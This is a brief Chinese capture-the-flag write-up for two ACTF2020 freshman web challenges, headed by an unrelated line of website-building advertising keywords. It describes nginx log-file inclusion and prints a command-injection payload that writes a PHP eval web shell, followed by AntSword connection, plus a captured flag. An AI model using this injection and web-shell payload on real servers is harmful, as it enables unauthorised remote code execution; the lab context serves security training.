ios网站开发教程,网站源码建站教程,广东官网网站建设价格,手机界面设计模板[ACTF2020 新生赛]Include 因为前端过滤的太多了 所以直接使用 日志包含 搞 包含这个 /var/log/nginx/access.log [ACTF2020 新生赛]Include蚁剑连接 翻看 flag{1ce7a81e-0339-44ef-a398-a7784d3efe37} [ACTF2020 新生赛]Exec [ACTF2020 新生赛]Exec 127.0.0.1 |echo <?…-
[ACTF2020 新生赛]Include
- 因为前端过滤的太多了 所以直接使用 日志包含 搞 包含这个 /var/log/nginx/access.log

- [ACTF2020 新生赛]Include
- 蚁剑连接

- 翻看

- flag{1ce7a81e-0339-44ef-a398-a7784d3efe37}
-
[ACTF2020 新生赛]Exec
- [ACTF2020 新生赛]Exec

- 127.0.0.1 |echo '<?php eval($_POST['a']);?>' > ./1.php

- 配合上传文件
- 蚁剑进行连接

-
